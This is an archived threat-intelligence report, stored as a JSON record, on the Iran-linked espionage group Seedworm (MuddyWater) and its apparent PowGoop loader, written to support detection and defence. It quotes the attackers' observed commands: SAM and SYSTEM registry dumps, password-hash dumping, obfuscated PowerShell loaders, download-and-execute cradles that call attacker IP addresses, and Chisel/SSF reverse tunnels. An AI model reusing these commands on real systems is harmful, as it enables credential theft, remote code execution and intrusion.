{
	"id": "895ce6d4-9cb6-4046-b98d-2e180dd65bf5",
	"created_at": "2026-04-06T00:18:54.731787Z",
	"updated_at": "2026-04-10T03:34:22.896547Z",
	"deleted_at": null,
	"sha1_hash": "acd59b18a0dc3ef92c23178da16b314b08c0eb04",
	"title": "Seedworm: Iran-Linked Group Continues to Target Organizations in the Middle East",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 54740,
	"plain_text": "Seedworm: Iran-Linked Group Continues to Target Organizations in the\r\nMiddle East\r\nArchived: 2026-04-05 17:52:01 UTC\r\nThe Iran-linked espionage group Seedworm (aka MuddyWater) has been highly active in recent months, attacking a wide\r\nrange of targets, including a large number of government organizations in the Middle East.\r\nMany of the organizations attacked by Seedworm in recent months have also been targeted by a recently discovered tool\r\ncalled PowGoop (Downloader.Covic), suggesting that it is a tool that Seedworm has incorporated into its arsenal. However,\r\nat present Symantec, a division of Broadcom (NASDAQ: AVGO), can only make a medium-confidence link between\r\nSeedworm and PowGoop.\r\nThe recent wave of Seedworm attacks was uncovered by Symantec’s Targeted Attack Cloud Analytics, which leverages\r\nadvanced machine learning to spot patterns of activity associated with targeted attacks. The activity was reviewed by\r\nSymantec’s Threat Hunter team (part of Symantec’s Endpoint Security Complete offering), which linked it to previous\r\nSeedworm activity.\r\nAmong the things flagged by Cloud Analytics was a registry key called “SecurityHealthCore”. The code residing in this\r\nregistry key is executed by PowerShell from a scheduled task. In all of the organizations where this registry key was found,\r\na known Seedworm backdoor (Backdoor.Mori) was subsequently detected.\r\nAttacks were uncovered against targets in Iraq, Turkey, Kuwait, the United Arab Emirates, and Georgia. 
In addition to some\r\ngovernment entities, organizations in the telecoms and computer services sector were also targeted.\r\nIn one such victim, a sample of Backdoor.Mori was dropped and installed as early as December 2019 on a SQL server.\r\nSeedworm activity continued until at least July 2020, with the installation of additional hacking tools by the attackers.\r\nDuring this time, Symantec observed Seedworm performing credential-stealing activities as well as setting up tunnels to its\r\nown infrastructure to assist with lateral movement using the open-source tools known as Secure Sockets Funneling (SSF) and\r\nChisel. Seedworm is known to have leveraged Chisel in the past.\r\nCredential stealing\r\nCredential dumping was done by dumping the contents of the Windows Registry to files in the same directories as\r\nSeedworm backdoors. Additionally, Seedworm was also observed using Quarks password dumper (Quarks PwDump) to\r\nsteal local account password hashes.\r\nreg save hklm\\system CSIDL_PROFILE\\public\\system.c\r\nreg save hklm\\sam CSIDL_PROFILE\\public\\sam.c\r\nCSIDL_COMMON_APPDATA\\dump.exe --dump-hash-local (sha2:\r\nf9c4f95592d0e543bca52f5882eace65fe3bbbb99bcaae6e97000115fb3cb781)\r\nTunneling back to the attackers’ infrastructure\r\nSeedworm was also observed setting up tunnels to its own infrastructure using Secure Sockets Funneling and Chisel. These\r\ntools allow the attackers to configure local and remote port forwarding as well as copying files to compromised machines.\r\nThe PowGoop connection\r\nOn the same machine where Seedworm was active, a tool known as PowGoop was deployed. This same tool was also\r\ndeployed against several of the organizations attacked by Seedworm in recent months; however, at present Symantec can\r\nonly establish a medium-confidence link between PowGoop and Seedworm.\r\nPowGoop, which was first publicly reported on in July 2020, is a loader DLL. 
It likely arrives in a ZIP file named\r\n‘google.zip’ containing the loader itself and legitimate Google binaries used for side-loading it.\r\nIn the same organization as mentioned previously, Symantec observed Seedworm activity which was followed by PowGoop\r\nactivity just six days later.\r\nIn the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as\r\nRemadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the\r\ncontents in memory. It appears this code is used to load PowGoop’s main DLL (goopdate.dll) via rundll32.exe.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\r\nPage 1 of 3\n\npowershell -exec bypass \"$a=gc C:\\WINDOWS\\TEMP\\ManyaBetta;del C:\\WINDOWS\\TEMP\\ManyaBetta;function\r\nGabrielle($OliviaTomi){$Emlyn = [System.Convert]::FromBase64String($OliviaTomi);return\r\n[System.Text.Encoding]::UTF8.GetString($Emlyn);}function Tina($Daisi){$OliviaTomi =\r\n[System.Text.Encoding]::UTF8.GetBytes($Daisi);for ($TheresitaNitaChad=0; $TheresitaNitaChad -le\r\n$OliviaTomi.count -1; $TheresitaNitaChad++){$OliviaTomi[$TheresitaNitaChad] =\r\n$OliviaTomi[$TheresitaNitaChad] - 2;}return [System.Text.Encoding]::UTF8.GetString($OliviaTomi);}function\r\nGlyndaMaureen($OliviaTomi){$Rosalinde = Gabrielle $OliviaTomi;$LeonaJolene = Tina $Rosalinde;return\r\n$LeonaJolene;};$t =GlyndaMaureen($a);\u0026($ShellId[1] + 'ex') $t;\"\r\nA feature of these files is that they have distinctive variable and function naming that resembles human names concatenated\r\ntogether. We have no reason to believe that these are actual people’s names.\r\nOn several of the victim machines, a ZIP file called ‘google.zip’ was also found present in the same directory. How the ZIP\r\nfile arrives on the victim’s computer remains unknown. The ZIP contains a mix of legitimate Google executables and\r\nmalicious DLL files. 
A legitimate ‘googleupdate.exe’ file is used to side load PowGoop via rundll32.exe. PowGoop loaders\r\nare used to decode and execute the contents of a file called ‘config.txt’. All config.txt files found to date\r\ncontained PowerShell scripts that download and execute more PowerShell code.\r\npowershell -exec bypass \"function bdec($in){$out = [System.Convert]::FromBase64String($in);return\r\n[System.Text.Encoding]::UTF8.GetString($out);}function bDec2($szinput){$in =\r\n[System.Text.Encoding]::UTF8.GetBytes($szinput);for ($i=0; $i -le $in.count -1; $i++){$in[$i] = $in[$i] - 2;}return\r\n[System.Text.Encoding]::UTF8.GetString($in);}function bDd($in){$dec = bdec $in;$temp = bDec2 $dec;return\r\n$temp;}$a=get-content \" config.txt\";$t =bDd $a;\u0026($ShellId[1] + 'ex') $t;\"\r\nRundll32.exe CSIDL_COMMON_APPDATA\\andreavania\\goopdate.dll,dllregisterserver\r\nIn some cases, PowGoop is used to launch ‘Wscript.exe’ to execute an unknown VBS file called ‘v.txt’.\r\n\"CSIDL_SYSTEM\\wscript.exe\" /e:vbs CSIDL_PROFILE\\[REDACTED]\\documents\\v.txt\r\nSimilarly, Symantec also observed legitimate tools (openssl.exe) and a downloader tool (ssleay32.dll) present in the same\r\ndirectories used to download additional tools:\r\nCSIDL_SYSTEM\\rundll32.exe CSIDL_COMMON_APPDATA\\georgettaemilee\\ssleay32.dll\r\n,DllRegisterServer http://107.173.141.103:443/downloadc.php?key=[REDACTED]\r\nCSIDL_SYSTEM\\rundll32.exe CSIDL_COMMON_APPDATA\\samariaantonina\\ssleay32.dll ,DllRegisterServer\r\nhttp://107.173.141.114:443/downloadc.php?key=[REDACTED]\r\nSimilar download requests were also observed via PowerShell:\r\npowershell -exec bypass $V=new-object net.webclient;$V.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$AaA =\r\n\"Do\";$AaB = \" wnloadStr\";$AaC = \"ing\";$s=\"$AaA$AaB$AaC\"('http://23.95.220.166:80/download.php?\r\nk=564');$s;\"\r\n$V=new-object 
net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=\r\n[Net.CredentialCache]::DefaultCredentials;start-sleep\r\n10;$s=$V.DownloadString('http://104.168.44.16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI');iex($s)\r\nDuring PowGoop activity, Symantec also observed the attackers using the Secure Sockets Funneling tool as well as Chisel,\r\nsuggesting a link between the two sets of activity.\r\n\"CSIDL_PROFILE\\[REDACTED]\\documents\\ussf.exe\" -c CSIDL_PROFILE\\[REDACTED]\\documents\\config.txt -\r\nF 9900 -p [REDACTED] 107.172.97.172\r\nCSIDL_COMMON_APPDATA\\sharp.cmd client 107.175.0.140:443 R:8888:127.0.0.1:9999\r\nCSIDL_COMMON_APPDATA\\sharp.cmd server -p [REDACTED] --socks5\r\nAdditional links between Seedworm and PowGoop\r\nIn several recent Seedworm attacks, PowGoop was used on computers that were also infected with known Seedworm\r\nmalware (Backdoor.Mori). In addition to this, activity involving Seedworm’s Powerstats (aka Powermud) backdoor appears\r\nto have been superseded by DLL side-loading of PowGoop.\r\nAdditionally, during PowGoop activity, we observed the attackers downloading tools and some unknown content from\r\nGitHub repos, similar to what has been reported on Seedworm’s Powerstats in the past.\r\npowershell -exec bypass $e=new-object net.webclient;$e.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=\r\n[Net.CredentialCache]::DefaultCredentials;$aa=$e.DownloadString('https://gist.githubusercontent.com/ffcommax/24587757d3328672954e4155a4\r\nThese patterns of activity beg the question as to whether PowGoop is actually an evolution of Powerstats rather than a\r\ncompletely new tool. To date, there is insufficient evidence to confirm this hypothesis. 
However, there are several\r\nsimilarities between the tools:\r\nUse of hard-coded GUID tokens and proxy URLs for command and control (C\u0026C) communications\r\nFetching and executing commands from C\u0026C servers using PowerShell\r\nSome low-confidence similarities in code structure and encoding techniques\r\nWhile none of this is sufficient to confirm that PowGoop has evolved from Powerstats, Symantec continues to monitor the\r\nactivity of Seedworm for any additional evidence.\r\nThanos ransomware link\r\nPowGoop has, in recent weeks, been loosely linked to a variant of ransomware known as Thanos. Thanos is an aggressive\r\nform of ransomware which, in addition to encryption, will also attempt to overwrite the master boot record (MBR) of the\r\ninfected computer.\r\nOur peers at Palo Alto Networks reported that PowGoop was found at a Middle Eastern state-run organization which was\r\nalso hit by Thanos. This led to the suspicion that the Thanos attackers were using PowGoop in their attacks; however, Palo\r\nAlto could not confirm the connection.\r\nSymantec has not found any evidence of a wiper or ransomware on computers infected with PowGoop. This suggests that\r\neither the simultaneous presence of PowGoop and Thanos in one attack was a coincidence or, if the two are linked, that\r\nPowGoop is not used exclusively to deliver Thanos.\r\nSymantec uncovered attacks involving PowGoop against organizations in Iraq, Afghanistan, Israel, Turkey, Azerbaijan,\r\nGeorgia, Cambodia, and Vietnam. Sectors targeted included governments, technology, telecoms, oil and gas, real estate, and\r\neducation.\r\nVigilance required\r\nSeedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering\r\noperations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest\r\nsome retooling on Seedworm’s part. 
Any organization that does find evidence of PowGoop on its network should exercise\r\nextreme caution and perform a thorough investigation.\r\nProtection\r\nThe following protections are in place to protect customers against Seedworm attacks:\r\nFile-based protection\r\nBackdoor.Mori\r\nBackdoor.Powemuddy\r\nDownloader.Covic\r\nNetwork-based protection\r\nSystem Infected: Trojan.Backdoor Activity 243\r\nIndicators of Compromise\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east"
	],
	"report_names": [
		"seedworm-apt-iran-middle-east"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434734,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/acd59b18a0dc3ef92c23178da16b314b08c0eb04.pdf",
		"text": "https://archive.orkl.eu/acd59b18a0dc3ef92c23178da16b314b08c0eb04.txt",
		"img": "https://archive.orkl.eu/acd59b18a0dc3ef92c23178da16b314b08c0eb04.jpg"
	}
}